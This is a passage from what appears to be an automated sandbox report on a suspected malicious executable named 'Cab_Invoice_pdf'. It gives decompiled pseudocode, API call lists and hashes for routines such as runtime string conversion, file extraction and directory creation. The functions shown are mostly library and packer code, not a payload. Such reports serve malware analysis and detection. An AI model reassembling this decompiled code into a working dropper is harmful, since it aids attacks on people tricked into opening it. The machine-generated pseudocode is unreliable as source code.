						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E01323980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E0132815E(_t99);
									goto L36;
								}
								_t60 = E01323980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E0132815E(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E01320A25(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E0132F250();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E01323980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E01320A25(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0132F250();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                            0x01328f56
                            0x01328f57
                            0x01328f58
                            0x01328f5f
                            0x01328f64
                            0x01328f6a
                            0x01328f70
                            0x01328f76
                            0x01328f79
                            0x01328f79
                            0x01328f7c
                            0x01328f7e
                            0x01328f7e
                            0x01328f7c
                            0x01328f80
                            0x01328f85
                            0x01328f8c
                            0x01328f8f
                            0x01328f8f
                            0x01328fab
                            0x01328fb1
                            0x01328fb6
                            0x01329149
                            0x01329154
                            0x0132915c
                            0x01328fbc
                            0x01328fbc
                            0x01328fbf
                            0x01328fc4
                            0x01328fc8
                            0x0132901c
                            0x0132901c
                            0x0132901e
                            0x01329020
                            0x0132913e
                            0x0132913e
                            0x01329140
                            0x01329141
                            0x01329147
                            0x00000000
                            0x01329147
                            0x01329031
                            0x01329037
                            0x01329039
                            0x00000000
                            0x00000000
                            0x0132903f
                            0x01329051
                            0x01329056
                            0x0132905a
                            0x00000000
                            0x00000000
                            0x01329067
                            0x013290a1
                            0x013290a4
                            0x013290a7
                            0x013290a9
                            0x013290ab
                            0x013290ad
                            0x013290f9
                            0x013290f9
                            0x013290fb
                            0x013290fb
                            0x013290fd
                            0x01329137
                            0x01329138
                            0x00000000
                            0x0132913d
                            0x01329111
                            0x01329116
                            0x01329118
                            0x00000000
                            0x00000000
                            0x0132911c
                            0x0132911d
                            0x0132911e
                            0x01329121
                            0x0132915d
                            0x01329160
                            0x01329123
                            0x01329123
                            0x01329124
                            0x01329124
                            0x01329131
                            0x01329133
                            0x01329135
                            0x01329166
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329135
                            0x013290af
                            0x013290b2
                            0x013290b4
                            0x013290b6
                            0x013290b8
                            0x013290bb
                            0x013290c0
                            0x013290db
                            0x013290dd
                            0x013290e7
                            0x013290e9
                            0x013290ea
                            0x013290ec
                            0x00000000
                            0x00000000
                            0x013290ee
                            0x013290f4
                            0x013290f4
                            0x00000000
                            0x013290f4
                            0x013290c2
                            0x013290c4
                            0x013290c8
                            0x013290cd
                            0x013290cf
                            0x013290d1
                            0x00000000
                            0x00000000
                            0x013290d3
                            0x00000000
                            0x013290d3
                            0x01329069
                            0x0132906e
                            0x00000000
                            0x00000000
                            0x01329074
                            0x01329076
                            0x00000000
                            0x00000000
                            0x01329092
                            0x01329096
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132909c
                            0x01328fcf
                            0x01328fd1
                            0x01328fd3
                            0x01328fdb
                            0x01328ffa
                            0x01328ffc
                            0x01329006
                            0x01329008
                            0x01329009
                            0x0132900b
                            0x00000000
                            0x00000000
                            0x01329011
                            0x01329017
                            0x01329017
                            0x00000000
                            0x01329017
                            0x01328fdf
                            0x01328fe3
                            0x01328fe8
                            0x01328fec
                            0x00000000
                            0x00000000
                            0x01328ff2
                            0x00000000
                            0x01328ff2

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0131C00D,0131C00D,?,?,?,013291A2,00000001,00000001,DEE85006), ref: 01328FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,013291A2,00000001,00000001,DEE85006,?,?,?), ref: 01329031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0132912B
                            • __freea.LIBCMT ref: 01329138
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • __freea.LIBCMT ref: 01329141
                            • __freea.LIBCMT ref: 01329166
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 00c36c352380db60a4c3e647d8dd708c2337319cee0787829235bb3fb91b46b6
                            • Instruction ID: c7aa4dd68e4af622cb59dfa7c3cbc7cc1c169d6af6af7919a172d54a677224f5
                            • Opcode Fuzzy Hash: 00c36c352380db60a4c3e647d8dd708c2337319cee0787829235bb3fb91b46b6
                            • Instruction Fuzzy Hash: 4951B67261023AABEB25AE69DC44FBB7BAAEF4465CF25462CFD04D6140DB34EC44C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324425, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E01324425(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x133c238; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E01320B10(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E01323862(_t25, __eflags,  *0x133c238, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E01324297(_t25, _t31, 0x13463f0);
							E013209EB(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E013209EB();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E01320ACD(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x133c238; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E01320B10(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E01323862(_t27, __eflags,  *0x133c238, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E01324297(_t27, _t32, 0x13463f0);
									E013209EB(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E013209EB();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0132380C(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0132380C(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                            0x01324425
                            0x01324425
                            0x01324425
                            0x0132442f
                            0x01324431
                            0x01324436
                            0x01324439
                            0x01324447
                            0x0132444e
                            0x01324453
                            0x01324456
                            0x01324459
                            0x0132446b
                            0x01324470
                            0x01324472
                            0x0132447d
                            0x01324484
                            0x01324489
                            0x0132448c
                            0x0132448e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324474
                            0x01324474
                            0x00000000
                            0x01324474
                            0x0132445b
                            0x0132445b
                            0x0132445c
                            0x0132445c
                            0x01324461
                            0x0132449c
                            0x0132449d
                            0x013244a3
                            0x013244a8
                            0x013244ab
                            0x013244ac
                            0x013244ad
                            0x013244b4
                            0x013244b6
                            0x013244b8
                            0x013244bd
                            0x013244c0
                            0x013244ce
                            0x013244da
                            0x013244dd
                            0x013244e0
                            0x013244f2
                            0x013244f7
                            0x013244f9
                            0x01324504
                            0x0132450a
                            0x01324512
                            0x01324514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244fb
                            0x013244fb
                            0x00000000
                            0x013244fb
                            0x013244e2
                            0x013244e2
                            0x013244e3
                            0x013244e3
                            0x01324516
                            0x01324517
                            0x01324517
                            0x013244c2
                            0x013244c8
                            0x013244cc
                            0x0132451f
                            0x01324520
                            0x01324526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244cc
                            0x0132452d
                            0x0132452d
                            0x0132443b
                            0x01324441
                            0x01324445
                            0x01324490
                            0x01324491
                            0x0132449b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324445

                            APIs
                            • GetLastError.KERNEL32(?,00000000,0131AFEC,00000000,?,?,0131A8EB,?,?,00000000), ref: 01324429
                            • _free.LIBCMT ref: 0132445C
                            • _free.LIBCMT ref: 01324484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0132449D
                            • _abort.LIBCMT ref: 013244A3
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 4c323bf164964730ba87560c9c0585fabda6a6246cda977f230f51871d9e930f
                            • Instruction ID: 48c04078b80047f953cfef0d1a04ca6adfce44a717642b6d56829de36ea83445
                            • Opcode Fuzzy Hash: 4c323bf164964730ba87560c9c0585fabda6a6246cda977f230f51871d9e930f
                            • Instruction Fuzzy Hash: 88F04632204B3277D62A327D6C08F2F2A7E9FC1B3CF200115F918F6195EF60C8068265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311320, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E01311320(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				signed int _t9;
				signed int _t15;
				signed int _t17;
				void* _t19;
				intOrPtr _t27;
				signed int _t28;
				intOrPtr _t29;
				signed int _t30;
				void* _t31;

				_t21 = __edx;
				_t20 = __ecx;
				_t29 =  *((intOrPtr*)(_t31 + 0x10));
				_t27 =  *((intOrPtr*)(_t31 + 0x10));
				_push(_t29);
				_push(_t27);
				_t19 = E01311220(__ecx, __edx);
				_t7 = E01313C20(__edx, _t27);
				if(_t7 != 0xffffffff) {
					_t3 = _t29 + 0x12; // 0x12
					_t23 = _t3;
					_t4 = _t27 + 0x2068; // 0x2068
					_push(_t3);
					_t9 = E01313EF0(_t19, _t3, __eflags);
					_t28 = _t9;
					_push( *((intOrPtr*)(_t29 + 0xc)));
					L01317864();
					_t30 = _t9;
					__eflags = _t28;
					if(__eflags != 0) {
						__eflags = E0131A6CB(_t20, _t19, _t30, 1, _t28) - 1;
						if(__eflags == 0) {
							L7:
							_push(_t28);
							E01319889(_t20, _t21, __eflags);
							L01319803(_t19);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t30;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t15 = E013117B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
								__eflags = _t15;
								return _t15;
							}
						}
					} else {
						_t17 = E013117B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
						__eflags = _t17;
						return _t17;
					}
				} else {
					return _t7;
				}
			}
















                            0x01311320
                            0x01311320
                            0x01311322
                            0x01311327
                            0x0131132b
                            0x0131132c
                            0x01311333
                            0x01311335
                            0x01311340
                            0x01311349
                            0x01311349
                            0x0131134c
                            0x01311352
                            0x01311354
                            0x0131135c
                            0x0131135e
                            0x01311361
                            0x01311366
                            0x01311368
                            0x0131136a
                            0x01311394
                            0x01311397
                            0x013113b8
                            0x013113b8
                            0x013113b9
                            0x013113bf
                            0x013113c7
                            0x013113cd
                            0x01311399
                            0x01311399
                            0x0131139b
                            0x00000000
                            0x0131139d
                            0x013113b0
                            0x013113b0
                            0x013113b7
                            0x013113b7
                            0x0131139b
                            0x0131136c
                            0x0131137f
                            0x0131137f
                            0x01311386
                            0x01311386
                            0x01311344
                            0x01311347
                            0x01311347

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 6640b1b5512350ff2f6fbfbe94cdf41bf19cc89d0f58d0e14d95f84fea24a444
                            • Instruction ID: 94b33d94137b5d2a63d3e381a4a4eca97b48a03033c3dc71815f33641ac37000
                            • Opcode Fuzzy Hash: 6640b1b5512350ff2f6fbfbe94cdf41bf19cc89d0f58d0e14d95f84fea24a444
                            • Instruction Fuzzy Hash: E5110473A4131923CA2831BE7C45CEB375DCED267EB040B76FA20D2649FA52951442B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FDDF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0131FDDF(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x13460bc; // 0xe55920
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E01320B10(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E013209EB(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0132688D(_t13);
									E013209EB(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                            0x0131fddf
                            0x0131fde2
                            0x0131fdea
                            0x0131fdf3
                            0x0131fe42
                            0x0131fdff
                            0x0131fe05
                            0x0131fe09
                            0x0131fe53
                            0x0131fe53
                            0x0131fe0b
                            0x0131fe13
                            0x0131fe16
                            0x0131fe19
                            0x0131fe4c
                            0x0131fe4d
                            0x00000000
                            0x0131fe1b
                            0x0131fe21
                            0x0131fe2d
                            0x00000000
                            0x0131fe2f
                            0x0131fe2f
                            0x0131fe30
                            0x0131fe31
                            0x0131fe37
                            0x0131fe3c
                            0x0131fe3f
                            0x00000000
                            0x0131fe3f
                            0x0131fe2d
                            0x0131fe19
                            0x0131fe48
                            0x0131fe4b
                            0x00000000
                            0x0131fe4b
                            0x0131fe46
                            0x00000000
                            0x0131fdec
                            0x0131fdf0
                            0x0131fdf0
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Y
                            • API String ID: 0-3319100138
                            • Opcode ID: b437245bfc9ce7ada0d73ea2f65766c1bb956a24775b91e7bc5d2b89ca697402
                            • Instruction ID: 6dea6ab17226b7dec6e8d329d7886201be7d06ebaf11757e0bf61ded4461cdcb
                            • Opcode Fuzzy Hash: b437245bfc9ce7ada0d73ea2f65766c1bb956a24775b91e7bc5d2b89ca697402
                            • Instruction Fuzzy Hash: 4901D1B2209A2A7EF629297C6CC0D6B6A5DEF41BBCB200329F535921DADB608C084170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314B30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E01314B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES _v16;
				signed int _t12;
				signed int _t19;
				signed int _t21;
				WCHAR* _t33;
				void* _t37;
				signed int _t40;

				E01317880();
				_t12 =  *0x133c008; // 0xa212446c
				_a8204 = _t12 ^ _t40;
				_t33 = _a8212;
				_t37 = E01314920();
				_t27 =  !=  ? _t37 : L"S-1-3-4";
				E013149D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
				LocalFree(_t37);
				_push(0);
				_v0 = 0xc;
				_push( &_a4);
				_push(1);
				_t19 =  &_a12;
				_a8 = 0;
				_push(_t19);
				L0131785E();
				if(_t19 != 0) {
					_t21 = CreateDirectoryW(_t33,  &_v16);
					asm("sbb eax, eax");
					E0131786A();
					return  ~( ~_t21) - 1;
				} else {
					E0131786A();
					return _t19 | 0xffffffff;
				}
			}











                            0x01314b35
                            0x01314b3a
                            0x01314b41
                            0x01314b4a
                            0x01314b56
                            0x01314b63
                            0x01314b72
                            0x01314b7b
                            0x01314b81
                            0x01314b87
                            0x01314b8f
                            0x01314b90
                            0x01314b92
                            0x01314b96
                            0x01314b9e
                            0x01314b9f
                            0x01314ba6
                            0x01314bc8
                            0x01314bd8
                            0x01314be0
                            0x01314beb
                            0x01314ba8
                            0x01314bb6
                            0x01314bc1
                            0x01314bc1

                            APIs
                              • Part of subcall function 01314920: GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                              • Part of subcall function 01314920: OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                              • Part of subcall function 01314920: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                              • Part of subcall function 01314920: GetLastError.KERNEL32 ref: 01314969
                              • Part of subcall function 01314920: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                              • Part of subcall function 01314920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                              • Part of subcall function 01314920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            • LocalFree.KERNEL32(00000000,01313D37,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01314B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 01314B9F
                            • CreateDirectoryW.KERNEL32(?,?,?), ref: 01314BC8
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction ID: d31da858ae76d3a8675c1b08c6ea0583cebb53ffa34459a206c86423f75a16da
                            • Opcode Fuzzy Hash: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction Fuzzy Hash: 0211A9716043019BE628EB29DC49BAB77D9EF84714F404A1EF845C62C5D6349904CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F4110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E79EDB4,name too long), ref: 6E2F412C
                            • PyErr_Format.PYTHON38(6E79EDB4,undefined character name '%s'), ref: 6E2F415C
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$FormatString
                            • String ID: name too long$undefined character name '%s'
                            • API String ID: 4212644371-4056717002
                            • Opcode ID: 3cd91e613fba1d85d694574b5d5bf6d9d76ad47f1a21b2917e2ceb4fc1ac1433
                            • Instruction ID: 90842696a6db3e267b9b97d987393696a2c219006eab18bdcada0a1d2a25887d
                            • Opcode Fuzzy Hash: 3cd91e613fba1d85d694574b5d5bf6d9d76ad47f1a21b2917e2ceb4fc1ac1433
                            • Instruction Fuzzy Hash: 8B018431190118EFDB009FD8EC88DD67BAEEB4636AF044065F50DCA201D772D566CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131D000, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131D000(void* __ebx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* _t4;

				_t21 = __edi;
				_t10 = __ebx;
				if(_a4 != 0) {
					_t23 = E0132F355(_a4, 0x2e);
					if(_t3 == 0 || E013251D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E013251D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".com") != 0) {
						_t4 = 0;
					} else {
						_t4 = 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                            0x0131d000
                            0x0131d000
                            0x0131d009
                            0x0131d01a
                            0x0131d020
                            0x0131d066
                            0x0131d06a
                            0x0131d06a
                            0x0131d06a
                            0x0131d06e
                            0x0131d00b
                            0x0131d00e
                            0x0131d00e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction ID: 2395bf84c06812b81f25b4b10ef1fc1c242fbb716d3831d5d651da67ddf11104
                            • Opcode Fuzzy Hash: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
